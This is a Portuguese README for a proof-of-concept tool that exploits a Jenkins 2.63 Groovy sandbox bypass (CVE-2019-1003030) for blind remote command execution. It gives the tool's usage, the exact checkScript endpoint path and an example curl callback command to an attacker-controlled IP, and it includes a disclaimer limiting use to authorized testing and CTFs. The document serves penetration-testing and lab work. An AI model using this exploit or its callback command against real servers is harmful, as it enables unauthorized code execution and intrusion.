
PoC para Jenkins 2.63 CVE-2019-1003030
Este projeto automatiza a criação e entrega de payloads Groovy para o endpoint de validação SecureGroovyScript do Jenkins usado pelo Jenkins 2.63. A ferramenta suporta execução interativa e de comando único. O exploit não retorna saída, então você terá que fazer algumas validações como curl no seu AP para garantir que funciona.
A ferramenta suporta ambos:
Aviso Legal
Este projeto é destinado apenas para pesquisa de segurança, CTFs, ambientes de laboratório e testes de penetração autorizados. Não o utilize contra sistemas sem permissão explícita.
usage: Poc.py -u http://10.10.10.10:8080/ [-c 'curl http://10.10.10.9/callback'] [-X POST] [-p /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript]
PoC for sandbox bypass for jenkins 2.63
options:
-h, --help show this help message and exit
-u, --url URL ip of target
-X, --method METHOD post or get
-b, --breadcrum BREADCRUM
optional jenkins crumb string
-c, --command COMMAND
command to run on jenkins, not output expected
-p, --path PATH path to the script, you might prepend more
Omita a opção -c para entrar em um prompt interativo. Exemplo abaixo, infelizmente não há saída, então, desde que você não esteja recebendo um 404, deve estar funcionando
